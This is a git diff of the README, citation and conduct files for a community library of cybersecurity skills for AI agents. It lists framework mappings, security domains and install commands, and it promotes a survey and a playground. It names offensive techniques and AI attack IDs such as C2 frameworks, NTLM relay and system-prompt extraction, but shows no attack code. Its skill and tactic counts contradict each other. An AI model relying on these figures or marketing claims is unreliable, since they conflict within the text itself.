 - AML.T0088 — Generate Deepfakes (AI Attack Staging)
 - AML.T0010 — AI Supply Chain Compromise (Initial Access)
 - AML.T0020 — Poison Training Data (Resource Development)
 - AML.T0070 — RAG Poisoning (Persistence)
 - AML.T0080 — AI Agent Context Poisoning (Persistence)
 - AML.T0056 — Extract LLM System Prompt (Exfiltration)
 ## MITRE D3FEND Coverage (v1.3)
 11 skills mapped to D3FEND defensive countermeasures.
 Countermeasures applied span D3FEND tactical categories:
 Harden, Detect, Isolate, Deceive, Evict, Restore.
 Each skill's d3fend_techniques field lists the top 5 most relevant
 defensive countermeasures derived from the skill's ATT&CK technique tags.
 ## NIST AI RMF Coverage (AI 100-1)
 85 skills mapped to NIST AI Risk Management Framework subcategories.
 Core functions covered:
 - GOVERN: Organizational accountability for AI risk (GOVERN-1.1, GOVERN-6.1, GOVERN-6.2)
 - MAP: AI risk identification and context (MAP-5.1, MAP-5.2, MAP-1.6)
 - MEASURE: AI risk analysis and evaluation (MEASURE-2.5, MEASURE-2.7, MEASURE-2.8, MEASURE-2.11)
 - MANAGE: AI risk response and recovery (MANAGE-2.4, MANAGE-3.1)
 GenAI-specific subcategories applied: GOVERN-6.1, GOVERN-6.2 (responsible deployment policies).
 ---
 <p align="center">
  <sub>Part of <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills">Anthropic Cybersecurity Skills</a> — 753+ open-source cybersecurity skills for AI agents</sub>
 </p>
@@ -0,0 +1,32 @@
 cff-version: 1.2.0
 message: "If you use this repository in your research, tools, or publications, please cite it as below."
 type: software
 title: "Anthropic-Cybersecurity-Skills"
 abstract: >
  A structured collection of 753 cybersecurity skills for AI agents, covering
  penetration testing, digital forensics, threat intelligence, incident response,
  cloud security, OT/SCADA security, AI security, and more. Each skill follows
  a standardized format with YAML frontmatter metadata, step-by-step procedures,
  tool commands, expected outputs, and MITRE ATT&CK mappings. Compatible with
  Claude Code, GitHub Copilot, Cursor, Windsurf, Gemini CLI, and 20+ AI agent
  platforms.
 authors:
  - name: "Mahipal"
    email: mukuljangra5@gmail.com
    alias: mukul975
 repository-code: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
 url: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
 license: Apache-2.0
 version: "1.1.0"
 date-released: "2026-03-21"
 keywords:
  - cybersecurity
  - AI agents
  - skills
  - penetration testing
  - digital forensics
  - threat intelligence
  - incident response
  - MITRE ATT&CK
  - Claude Code
  - open source
@@ -36,7 +36,7 @@ This Code of Conduct applies within all community spaces, and also applies when
 ## Enforcement
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at mukul975@users.noreply.github.com. All complaints will be reviewed and investigated promptly and fairly.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at mukuljangra5@gmail.com. All complaints will be reviewed and investigated promptly and fairly.
 All community leaders are obligated to respect the privacy and security of the reporter of any incident.
@@ -1,124 +1,430 @@
 <p align="center">
-  <img src="assets/banner.png" alt="Anthropic Cybersecurity Skills" width="600">
+  <img src="assets/banner.png" alt="Anthropic Cybersecurity Skills" width="100%">
 </p>
-<p align="center">
+<div align="center">
  <strong>611+ cybersecurity skills for AI agents &middot; agentskills.io open standard</strong>
 </p>
-<p align="center">
+#  Anthropic Cybersecurity Skills
-  <a href="LICENSE"><img src="https://img.shields.io/badge/license-Apache_2.0-blue.svg?style=flat" alt="License"></a>
+
-  <img src="https://img.shields.io/badge/skills-611%2B-brightgreen?style=flat" alt="Skills Count">
+### The largest open-source cybersecurity skills library for AI agents
-  <img src="https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=flat" alt="Stars">
+
-  <img src="https://img.shields.io/github/last-commit/mukul975/Anthropic-Cybersecurity-Skills?style=flat" alt="Last Commit">
+[![GARS-2026 Survey](https://img.shields.io/badge/GARS--2026-Take%20the%20Survey-E8B84B?style=for-the-badge&logo=googleforms&logoColor=black)](https://mahipal.engineer/survey?utm_source=github_badge&utm_medium=readme&utm_campaign=gars2026)
-  <a href="https://agentskills.io"><img src="https://img.shields.io/badge/standard-agentskills.io-purple?style=flat" alt="Agent Skills"></a>
+[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg?style=flat-square)](LICENSE)
-  <img src="https://img.shields.io/badge/platforms-26%2B-orange?style=flat" alt="Platforms">
+[![Skills](https://img.shields.io/badge/skills-817-brightgreen?style=flat-square)](#whats-inside--29-security-domains)
-</p>
+[![Frameworks](https://img.shields.io/badge/frameworks-6-orange?style=flat-square)](#six-frameworks-one-skill-library)
 [![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
 [![Domains](https://img.shields.io/badge/domains-29-9cf?style=flat-square)](#whats-inside--29-security-domains)
 [![Platforms](https://img.shields.io/badge/platforms-26%2B-blueviolet?style=flat-square)](#compatible-platforms)
 [![GitHub stars](https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/network/members)
 [![Last Commit](https://img.shields.io/github/last-commit/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/commits/main)
 [![agentskills.io](https://img.shields.io/badge/standard-agentskills.io-ff6600?style=flat-square)](https://agentskills.io)
 [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](CONTRIBUTING.md)
 [![Playground](https://img.shields.io/badge/Playground-Casky.ai-blue)](https://casky.ai/?utm_source=github&utm_medium=readme&utm_campaign=cohort_launch#waitlist)
 [![Hermes Agent](https://img.shields.io/badge/Hermes_Agent-compatible-blueviolet?style=flat)](https://github.com/NousResearch/hermes-agent)
 **817 production-grade cybersecurity skills · 29 security domains · 6 framework mappings · 26+ AI platforms**
 [Get Started](#quick-start) · [What's Inside](#whats-inside--29-security-domains) · [Frameworks](#five-frameworks-one-skill-library) · [Platforms](#compatible-platforms) · [Contributing](#contributing)
 </div>
 ---
-The largest open-source collection of cybersecurity skills for AI agents. Every skill follows the [agentskills.io](https://agentskills.io) open standard and works instantly with Claude Code, GitHub Copilot, OpenAI Codex CLI, Cursor, Gemini CLI, and 20+ other platforms.
+> ⚠️ **Community Project** — This is an independent, community-created project. Not affiliated with Anthropic PBC. 
-## Quick Start (30 seconds)
+## Give any AI agent the security skills of a senior analyst
 A junior analyst knows which Volatility3 plugin to run on a suspicious memory dump, which Sigma rules catch Kerberoasting, and how to scope a cloud breach across three providers. **Your AI agent doesn't — unless you give it these skills.**
 This repo contains **817 structured cybersecurity skills** spanning **29 security domains**, each following the [agentskills.io](https://agentskills.io) open standard.  Every skill is mapped to **six industry frameworks** — MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, MITRE D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3) — making this the only open-source skills library with unified cross-framework coverage.  Clone it, point your agent at it, and your next security investigation gets expert-level guidance in seconds.
 ## Six frameworks, one skill library
 No other open-source skills library maps every skill to all of these frameworks.  One skill, six compliance checkboxes. 
 | Framework | Version | Scope in this repo | What it maps |
 |---|---|---|---|
 | [MITRE ATT&CK](https://attack.mitre.org) | v19.1 | 15 tactics · 286 techniques | Adversary behaviors and TTPs |
 | [NIST CSF 2.0](https://www.nist.gov/cyberframework) | 2.0 | 6 functions · 22 categories | Organizational security posture |
 | [MITRE ATLAS](https://atlas.mitre.org) | v5.4 | 16 tactics · 84 techniques | AI/ML adversarial threats |
 | [MITRE D3FEND](https://d3fend.mitre.org) | v1.3 | 7 categories · 267 techniques | Defensive countermeasures |
 | [NIST AI RMF](https://airc.nist.gov/AI_RMF) | 1.0 | 4 functions · 72 subcategories | AI risk management |
 | [MITRE F3 (Fight Fraud Framework)](https://ctid.mitre.org/fraud/) | v1.1 (2026-04-09) | 8 tactics · 123 techniques · 94 fraud-relevant skills | Cyber-enabled financial fraud TTPs |
 **Example — a single skill maps across all six:**
 | Skill | ATT&CK | NIST CSF | ATLAS | D3FEND | AI RMF | F3 |
 |---|---|---|---|---|---|---|
 | `analyzing-network-traffic-of-malware` | T1071 | DE.CM | AML.T0047 | D3-NTA | MEASURE-2.6 | — |
 | `detecting-business-email-compromise` | T1566 | DE.AE | — | — | — | F1005.006 · monetization |
 ### 🆕 MITRE Fight Fraud Framework (F3) — 94 fraud-relevant skills
 [![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
 The **[MITRE Fight Fraud Framework (F3)](https://ctid.mitre.org/fraud/)** was released **April 9, 2026** by MITRE's Center for Threat-Informed Defense (CTID), co-developed with JPMorganChase, Citigroup, Lloyds Banking Group, Standard Chartered, CrowdStrike, Verizon Business, FS-ISAC, and others. It is an ATT&CK-compatible TTP catalog for **cyber-enabled financial fraud** — filling the gap ATT&CK leaves after initial compromise.
 F3 v1.1 adds **two fraud-specific tactics** that ATT&CK does not enumerate:
 - **Positioning** (`FA0001`) — actions taken after access to collect/manipulate data and prepare the fraud (synthetic-identity seeding, account warming, beneficiary setup, SIM-swap pre-positioning, banking-session hijack).
 - **Monetization** (`FA0002`) — converting stolen assets into usable funds (money-mule layering, APP fraud, crypto off-ramping, card cash-out, refund/chargeback abuse).
 Fraud-specific techniques use `F1XXX` IDs (e.g. `F1005.003` Add Beneficiary, `F1025.003` Wire Transfer, `F1007` Adversary-in-the-Browser); reused ATT&CK techniques keep their `T1XXX` IDs. Mappings live in each skill's `mitre_f3:` frontmatter block — all 123 F3 v1.1 technique IDs were verified against the upstream STIX bundle. See [`docs/mitre-f3-mapping.md`](docs/mitre-f3-mapping.md) for the schema.
 ### MITRE ATT&CK v19.1 — 754/754 skills mapped
 Every skill carries a `mitre_attack` frontmatter list validated against **MITRE ATT&CK v19.1** (the latest release) using the official `mitreattack-python` library — 286 distinct techniques across all 15 Enterprise tactics, plus ICS and Mobile techniques where relevant. Zero revoked or deprecated IDs. v19.1's restructured Defense Evasion (now split into **Stealth** and **Defense Impairment**) is reflected below.
 | Tactic | ID | Skills |
 |--------|----|--------|
 | Reconnaissance | TA0043 | 103 |
 | Resource Development | TA0042 | 22 |
 | Initial Access | TA0001 | 467 |
 | Execution | TA0002 | 350 |
 | Persistence | TA0003 | 444 |
 | Privilege Escalation | TA0004 | 464 |
 | Stealth | TA0005 | 442 |
 | Defense Impairment | TA0112 | 92 |
 | Credential Access | TA0006 | 202 |
 | Discovery | TA0007 | 237 |
 | Lateral Movement | TA0008 | 68 |
 | Collection | TA0009 | 172 |
 | Command and Control | TA0011 | 123 |
 | Exfiltration | TA0010 | 82 |
 | Impact | TA0040 | 50 |
 ## Quick start
 ```bash
-# Add as Claude Code marketplace
+# Option 1: npx (recommended)
-/plugin marketplace add mukul975/Anthropic-Cybersecurity-Skills
+npx skills add mukul975/Anthropic-Cybersecurity-Skills
-# Or clone directly
+# Option 2: Git clone
-git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills .skills/cybersecurity
+git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
 cd Anthropic-Cybersecurity-Skills
 ```
-## Skill Categories
+Works immediately with Claude Code, GitHub Copilot, OpenAI Codex CLI, Cursor, Gemini CLI, and any [agentskills.io](https://agentskills.io)-compatible platform. 
-| Category | Skills | Example Skills |
+## 🌍 GARS-2026 — Global Agentic AI Readiness Survey
 |----------|-------:|----------------|
 | Cloud Security | 48 | AWS S3 Bucket Audit, Azure AD Configuration, GCP Security Assessment |
 | Threat Intelligence | 43 | APT Group Analysis with MITRE Navigator, Campaign Attribution, Dark Web Monitoring |
 | Web Application Security | 41 | HTTP Request Smuggling, XSS with Burp Suite, Web Cache Poisoning |
 | Threat Hunting | 35 | Credential Dumping Detection, DNS Tunneling with Zeek, Living-off-the-Land Binaries |
 | Malware Analysis | 34 | Cobalt Strike Beacon Config, Ghidra Reverse Engineering, YARA Rule Development |
 | Digital Forensics | 34 | Disk Imaging with dd/dcfldd, Memory Forensics with Volatility3, Browser Forensics |
 | SOC Operations | 33 | Windows Event Log Analysis, Splunk Detection Rules, SIEM Use Case Implementation |
 | Network Security | 33 | Wireshark Traffic Analysis, VLAN Segmentation, Suricata IDS Configuration |
 | Identity & Access Management | 33 | SAML SSO with Okta, Privileged Access Management, RBAC for Kubernetes |
 | OT/ICS Security | 28 | SCADA System Attack Detection, Modbus Anomaly Detection, Purdue Model Segmentation |
 | API Security | 28 | API Enumeration Detection, BOLA Exploitation, GraphQL Security Assessment |
 | Container Security | 26 | Trivy Image Scanning, Falco Runtime Detection, Kubernetes Pod Security |
 | Vulnerability Management | 24 | DefectDojo Dashboard, CVSS Scoring, Patch Management Workflow |
 | Red Teaming | 24 | Sliver C2 Framework, BloodHound AD Analysis, Kerberoasting with Impacket |
 | Incident Response | 24 | Ransomware Response, Cloud Incident Containment, Volatile Evidence Collection |
 | Penetration Testing | 23 | External Network Pentest, Kubernetes Pentest, Active Directory Pentest |
 | Zero Trust Architecture | 17 | HashiCorp Boundary, Zscaler ZTNA, BeyondCorp Access Model |
 | Endpoint Security | 16 | CIS Benchmark Hardening, Windows Defender Configuration, Host-Based IDS |
 | DevSecOps | 16 | GitLab CI Pipeline, Semgrep Custom SAST Rules, Secret Scanning with Gitleaks |
 | Phishing Defense | 16 | Email Header Analysis, GoPhish Simulation, DMARC/DKIM/SPF Configuration |
 | Cryptography | 13 | TLS 1.3 Configuration, HSM Key Storage, Certificate Authority with OpenSSL |
 | Mobile Security | 12 | iOS App Analysis with Objection, Android Malware Reverse Engineering, Frida Hooking |
 | Ransomware Defense | 5 | Ransomware Precursor Detection, Backup Strategy, Honeypot Detection |
 | Compliance & Governance | 5 | GDPR Data Protection, ISO 27001 ISMS, PCI DSS Controls |
-## How It Works
+I'm running a global academic study measuring how ready security professionals,
 developers, and enterprise teams actually are for agentic AI — MCP servers,
 tool calling, governance, and human-in-the-loop workflows.
-Each skill follows the [agentskills.io](https://agentskills.io) **progressive disclosure** pattern. During discovery, an AI agent reads only the YAML frontmatter (~30-50 tokens) to decide relevance:
+**If you use this repo, your response would be a genuinely valuable data point.**
-```yaml
+📋 **Take the survey (10 min):**
---
+[Survey Link](https://mahipal.engineer/survey?utm_source=github_repo&utm_medium=readme&utm_campaign=gars2026)
-name: performing-memory-forensics-with-volatility3
+
-description: Analyze memory dumps to extract processes, network connections, and malware artifacts using Volatility3.
+- 60 questions · Anonymous · Supervised by SRH Berlin
-domain: cybersecurity
+- You get **50 Casky Tokens** for early access to [casky.ai](https://casky.ai)
-subdomain: digital-forensics
+- Results published open access under CC-BY 4.0
-tags: [forensics, memory-analysis, volatility3, incident-response]
+
---
+## 🚀 Try it on the Playground
 Experience Casky.ai hands-on — no setup required.
 **[→ Launch Playground on Casky.ai](https://casky.ai/?utm_source=github&utm_medium=readme&utm_campaign=cohort_launch#waitlist)**
 The playground lets you:
 - Run live cybersecurity skill exercises against real targets
 - See AI agents execute structured skills in real time
 - Explore MITRE ATT&CK mapped workflows interactively
 - Test threat hunting, DFIR, and penetration testing scenarios
 No installation. No configuration. Just open and start.
 ## Why this exists
 The cybersecurity workforce gap hit **4.8 million unfilled roles** globally in 2024 (ISC2). AI agents can help close that gap — but only if they have structured domain knowledge to work from. Today's agents can write code and search the web, but they lack the practitioner playbooks that turn a generic LLM into a capable security analyst.
 Existing security tool repos give you wordlists, payloads, or exploit code. None of them give an AI agent the structured decision-making workflow a senior analyst follows: when to use each technique, what prerequisites to check, how to execute step-by-step, and how to verify results. That is the gap this project fills.
 **Anthropic Cybersecurity Skills** is not a collection of scripts or checklists. It is an **AI-native knowledge base** built from the ground up for the agentskills.io standard  — YAML frontmatter for sub-second discovery, structured Markdown for step-by-step execution, and reference files for deep technical context.  Every skill encodes real practitioner workflows, not generated summaries. 
 ## What's inside — 29 security domains
 | Domain | Skills | Key capabilities |
 |---|---|---|
 | Cloud Security | 66 | AWS, Azure, GCP hardening · CSPM · cloud attack emulation · cloud forensics |
 | Threat Hunting | 58 | Hypothesis-driven hunts · LOTL detection · EVTX hunting · fleet hunting |
 | Threat Intelligence | 52 | STIX/TAXII · MISP · OpenCTI · feed integration · actor profiling |
 | Network Security | 43 | IDS/IPS · firewall rules · VLAN segmentation · traffic analysis |
 | Web Application Security | 42 | OWASP Top 10 · SQLi · XSS · SSRF · deserialization |
 | Digital Forensics | 41 | Disk imaging · memory forensics · Hayabusa/KAPE/Plaso timelines |
 | Malware Analysis | 39 | Static/dynamic analysis · reverse engineering · sandboxing |
 | Identity & Access Management | 37 | Entra ID/ROADtools · device-code phishing · PAM · zero trust identity |
 | SOC Operations | 35 | Playbooks · escalation workflows · Graph-log detection · tabletop exercises |
 | Red Teaming | 33 | ADCS/Certipy · BloodHound CE · Sliver/Havoc C2 · NTLM relay |
 | Container Security | 33 | K8s RBAC · image scanning · Falco · container escape |
 | Security Operations | 28 | SIEM correlation · log analysis · alert triage |
 | OT/ICS Security | 28 | Modbus · DNP3 · IEC 62443 · historian defense · SCADA |
 | API Security | 28 | GraphQL · REST · OWASP API Top 10 · WAF bypass |
 | Incident Response | 26 | Breach containment · ransomware response · IR playbooks |
 | Vulnerability Management | 25 | Nessus · scanning workflows · patch prioritization · CVSS |
 | Penetration Testing | 21 | Network · web · cloud · mobile · NetExec lateral movement |
 | DevSecOps | 18 | CI/CD security · Trivy IaC/image scanning · code signing |
 | Zero Trust Architecture | 17 | BeyondCorp · CISA maturity model · microsegmentation |
 | Endpoint Security | 17 | EDR · LOTL detection · fileless malware · persistence hunting |
 | Cryptography | 16 | TLS · Ed25519 · post-quantum migration · key management |
 | Phishing Defense | 15 | Email authentication · BEC detection · phishing IR |
 | AI Security | 14 | LLM red-teaming (garak/PyRIT) · prompt injection · MCP/agentic security · guardrails |
 | Mobile Security | 13 | Android/iOS analysis · mobile pentesting · MDM forensics |
 | Ransomware Defense | 13 | Precursor detection · response · recovery · encryption analysis |
 | Compliance & Governance | 9 | NIST 800-30/RMF · CMMC · HIPAA · TPRM · CIS benchmarks |
 | Supply Chain Security | 8 | SBOMs · dependency confusion · malicious-package triage · SLSA/Sigstore |
 | Deception Technology | 6 | Honeytokens · canarytokens · breach detection |
 | Hardware & Firmware Security | 4 | CHIPSEC/UEFI audit · Secure Boot bypass · TPM attestation · bootkit hunting |
 ## How AI agents use these skills
 Each skill costs **~30 tokens to scan** (frontmatter only)  and **500–2,000 tokens to fully load** (complete workflow). This progressive disclosure architecture lets agents search all 817 skills in a single pass without blowing context windows. 
 ```
 User prompt: "Analyze this memory dump for signs of credential theft"
 Agent's internal process:
  1. Scans 817 skill frontmatters (~30 tokens each)
     → identifies 12 relevant skills by matching tags, description, domain
  2. Loads top 3 matches:
     • performing-memory-forensics-with-volatility3
     • hunting-for-credential-dumping-lsass
     • analyzing-windows-event-logs-for-credential-access
  3. Executes the structured Workflow section step-by-step
     → runs Volatility3 plugins, checks LSASS access patterns,
        correlates with event log evidence
  4. Validates results using the Verification section
     → confirms IOCs, maps findings to ATT&CK T1003 (Credential Dumping)
 ```
-If the skill matches the task, the agent loads the full body -- workflow steps, prerequisites, tool commands, and verification checks -- without wasting tokens on irrelevant skills.
+**Without these skills**, the agent guesses at tool commands and misses critical steps. **With them**, it follows the same playbook a senior DFIR analyst would use. 
-## Compatible Platforms
+## Skill anatomy
 These skills work with any tool that supports the agentskills.io standard or can read structured Markdown:
 | Platform | Integration |
 |----------|------------|
 | **Claude Code** | Native skill loading via `/plugin` |
 | **GitHub Copilot** | Workspace context via `.skills/` directory |
 | **OpenAI Codex CLI** | File-based context injection |
 | **Cursor** | Project rules and docs integration |
 | **Gemini CLI** | Context file loading |
 | **Amp** | Skill directory mounting |
 | **Goose** | Plugin-based skill loading |
 | **Windsurf** | Context awareness from project files |
 | **Aider** | Repository map integration |
 | **Continue** | Custom context providers |
 | And 16+ others | Any agent that reads structured Markdown |
 ## Skill Anatomy
 Every skill follows a consistent directory structure:
 ```
-skills/{skill-name}/
+skills/performing-memory-forensics-with-volatility3/
-├── SKILL.md            # Skill definition with YAML frontmatter
+├── SKILL.md              ← Skill definition (YAML frontmatter + Markdown body)
 │   ├── Frontmatter     # name, description, domain, subdomain, tags
 │   ├── When to Use     # Trigger conditions for AI agents
 │   ├── Prerequisites   # Required tools and access
 │   ├── Workflow         # Step-by-step execution guide
 │   └── Verification    # How to confirm success
 ├── references/
-│   ├── standards.md    # NIST, MITRE ATT&CK, CVE references
+│   ├── standards.md      ← MITRE ATT&CK, ATLAS, D3FEND, NIST mappings
-│   └── workflows.md    # Deep technical procedure reference
+│   └── workflows.md      ← Deep technical procedure reference
 ├── scripts/
-│   └── process.py      # Practitioner helper scripts
+│   └── process.py        ← Working helper scripts
 └── assets/
-    └── template.md     # Checklists and report templates
+    └── template.md       ← Filled-in checklists and report templates
 ```
 ### YAML frontmatter (real example)
 ```yaml
 ---
 name: performing-memory-forensics-with-volatility3
 description: >-
  Analyze memory dumps to extract running processes, network connections,
  injected code, and malware artifacts using the Volatility3 framework.
 domain: cybersecurity
 subdomain: digital-forensics
 tags: [forensics, memory-analysis, volatility3, incident-response, dfir]
 atlas_techniques: [AML.T0047]
 d3fend_techniques: [D3-MA, D3-PSMD]
 nist_ai_rmf: [MEASURE-2.6]
 nist_csf: [DE.CM-01, RS.AN-03]
 version: "1.2"
 author: mukul975
 license: Apache-2.0
 ---
 ```
 ### Markdown body sections
 ```markdown
 ## When to Use
 Trigger conditions — when should an AI agent activate this skill?
 ## Prerequisites
 Required tools, access levels, and environment setup.
 ## Workflow
 Step-by-step execution guide with specific commands and decision points.
 ## Verification
 How to confirm the skill was executed successfully.
 ```
 Frontmatter fields: `name` (kebab-case, 1–64 chars), `description` (keyword-rich for agent discovery), `domain`, `subdomain`, `tags`,  `atlas_techniques` (MITRE ATLAS IDs), `d3fend_techniques` (MITRE D3FEND IDs), `nist_ai_rmf` (NIST AI RMF references), `nist_csf` (NIST CSF 2.0 categories).  MITRE ATT&CK technique mappings are documented in each skill's `references/standards.md` file and in the ATT&CK Navigator layer included with releases. 
 <details>
 <summary><strong>📊 MITRE ATT&CK Enterprise coverage — all 14 tactics</strong></summary>
 &nbsp;
 | Tactic | ID | Coverage | Key skills |
 |---|---|---|---|
 | Reconnaissance | TA0043 | Strong | OSINT, subdomain enumeration, DNS recon |
 | Resource Development | TA0042 | Moderate | Phishing infrastructure, C2 setup detection |
 | Initial Access | TA0001 | Strong | Phishing simulation, exploit detection, forced browsing |
 | Execution | TA0002 | Strong | PowerShell analysis, fileless malware, script block logging |
 | Persistence | TA0003 | Strong | Scheduled tasks, registry, service accounts, LOTL |
 | Privilege Escalation | TA0004 | Strong | Kerberoasting, AD attacks, cloud privilege escalation |
 | Defense Evasion | TA0005 | Strong | Obfuscation, rootkit analysis, evasion detection |
 | Credential Access | TA0006 | Strong | Mimikatz detection, pass-the-hash, credential dumping |
 | Discovery | TA0007 | Moderate | BloodHound, AD enumeration, network scanning |
 | Lateral Movement | TA0008 | Strong | SMB exploits, lateral movement detection with Splunk |
 | Collection | TA0009 | Moderate | Email forensics, data staging detection |
 | Command and Control | TA0011 | Strong | C2 beaconing, DNS tunneling, Cobalt Strike analysis |
 | Exfiltration | TA0010 | Strong | DNS exfiltration, DLP controls, data loss detection |
 | Impact | TA0040 | Strong | Ransomware defense, encryption analysis, recovery |
 An **ATT&CK Navigator layer file** is included in the [v1.0.0 release assets](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0) for visual coverage mapping. 
 > **Note:** ATT&CK v19 lands April 28, 2026 — splitting Defense Evasion (TA0005) into two new tactics: *Stealth* and *Impair Defenses*.  Skill mappings will be updated in a forthcoming release.
 </details>
 <details>
 <summary><strong>📊 NIST CSF 2.0 alignment — all 6 functions</strong></summary>
 &nbsp;
 | Function | Skills | Examples |
 |---|---|---|
 | **Govern (GV)** | 30+ | Risk strategy, policy frameworks, roles & responsibilities |
 | **Identify (ID)** | 120+ | Asset discovery, threat landscape assessment, risk analysis |
 | **Protect (PR)** | 150+ | IAM hardening, WAF rules, zero trust, encryption |
 | **Detect (DE)** | 200+ | Threat hunting, SIEM correlation, anomaly detection |
 | **Respond (RS)** | 160+ | Incident response, forensics, breach containment |
 | **Recover (RC)** | 40+ | Ransomware recovery, BCP, disaster recovery |
 NIST CSF 2.0 (February 2024) added the **Govern** function  and expanded scope from critical infrastructure to all organizations.  Skill mappings align to all 22 categories and reference 106 subcategories. 
 </details>
 <details>
 <summary><strong>📊 Framework deep dive — ATLAS, D3FEND, AI RMF</strong></summary>
 &nbsp;
 ### MITRE ATLAS v5.4 — AI/ML adversarial threats
 ATLAS maps adversarial tactics, techniques, and case studies specific to AI and machine learning systems. Version 5.4 covers **16 tactics and 84 techniques** including agentic AI attack vectors added in late 2025: AI agent context poisoning, tool invocation abuse, MCP server compromises, and malicious agent deployment.  Skills mapped to ATLAS help agents identify and defend against threats to ML pipelines, model weights, inference APIs, and autonomous workflows. 
 ### MITRE D3FEND v1.3 — Defensive countermeasures
 D3FEND is an NSA-funded knowledge graph of **267 defensive techniques** organized across 7 tactical categories: Model, Harden, Detect, Isolate, Deceive, Evict, and Restore.  Built on OWL 2 ontology, it uses a shared Digital Artifact layer to bidirectionally map defensive countermeasures to ATT&CK offensive techniques.  Skills tagged with D3FEND identifiers let agents recommend specific countermeasures for detected threats.
 ### NIST AI RMF 1.0 + GenAI Profile (AI 600-1)
 The AI Risk Management Framework defines 4 core functions — Govern, Map, Measure, Manage — with **72 subcategories** for trustworthy AI development.  The GenAI Profile (AI 600-1, July 2024) adds **12 risk categories** specific to generative AI, from confabulation and data privacy to prompt injection and supply chain risks.  Colorado's AI Act (effective February 2026) provides a **legal safe harbor** for organizations complying with NIST AI RMF, making these mappings directly relevant to regulatory compliance.
 </details>
 ## Compatible platforms
 **AI code assistants**
 Claude Code (Anthropic) · GitHub Copilot (Microsoft) · Cursor · Windsurf · Cline · Aider · Continue · Roo Code · Amazon Q Developer · Tabnine · Sourcegraph Cody · JetBrains AI 
 **CLI agents**
 OpenAI Codex CLI · Gemini CLI (Google) 
 **Autonomous agents**
 Devin · Replit Agent · SWE-agent · OpenHands 
 **Agent frameworks & SDKs**
 LangChain · CrewAI · AutoGen · Semantic Kernel · Haystack · Vercel AI SDK · Any MCP-compatible agent 
 All platforms that support the [agentskills.io](https://agentskills.io) standard can load these skills with zero configuration. 
 ## What people are saying
 > *"A database of real, organized security skills that any AI agent can plug into and use. Not tutorials. Not blog posts."* 
 > — **[Hasan Toor (@hasantoxr)](https://x.com/hasantoxr/status/2033193922349179249)**, AI/tech creator
 > *"This is not a random collection of security scripts. It's a structured operational knowledge base designed for AI-driven security workflows."* 
 > — **[fazal-sec](https://fazal-sec.medium.com/claude-skills-ai-powered-cybersecurity-the-complete-guide-to-building-intelligent-security-7bb7e9d14c8e)**,  Medium
 ## Featured in
 | Where | Type | Link |
 |---|---|---|
 | **awesome-agent-skills** | Awesome List (1,000+ skills index) | [VoltAgent/awesome-agent-skills](https://github.com/VoltAgent/awesome-agent-skills) |
 | **awesome-ai-security** | Awesome List (AI security tools) | [ottosulin/awesome-ai-security](https://github.com/ottosulin/awesome-ai-security) |
 | **awesome-codex-cli** | Awesome List (Codex CLI resources) | [RoggeOhta/awesome-codex-cli](https://github.com/RoggeOhta/awesome-codex-cli) |
 | **SkillsLLM** | Skills directory & marketplace | [skillsllm.com/skill/anthropic-cybersecurity-skills](https://skillsllm.com/skill/anthropic-cybersecurity-skills) |
 | **Openflows** | Signal analysis & tracking | [openflows.org](https://openflows.org/currency/currents/anthropic-cybersecurity-skills/) |
 | **NeverSight skills_feed** | Automated skills index | [NeverSight/skills_feed](https://github.com/NeverSight/skills_feed) |
 ## Star history
 <a href="https://star-history.com/#mukul975/Anthropic-Cybersecurity-Skills&Date">
 <picture>
   <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date&theme=dark" />
   <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date" />
   <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date" width="100%" />
 </picture>
 </a>
 ## Releases
 | Version | Date | Highlights |
 |---|---|---|
 | [v1.0.0](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0) | March 11, 2026 | 734 skills · 26 domains · MITRE ATT&CK + NIST CSF 2.0 mapping · ATT&CK Navigator layer |
 Skills have continued to grow on `main` since v1.0.0 — the library now contains **817 skills** with **6-framework mapping**  (MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework added post-release).  Check [Releases](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases) for the latest tagged version.
 ## Contributing
-We welcome contributions from the cybersecurity community. See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on adding new skills, improving existing ones, and our review process.
+This project grows through community contributions. Here is how to get involved:
 **Add a new skill** — Domains like Deception Technology (2 skills) and Compliance & Governance (5 skills) need the most help. Follow the template in [CONTRIBUTING.md](CONTRIBUTING.md) and submit a PR with the title `Add skill: your-skill-name`.
 **Improve existing skills** — Add framework mappings, fix workflows, update tool references, or contribute scripts and templates.
 **Report issues** — Found an inaccurate procedure or broken script? [Open an issue](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues).
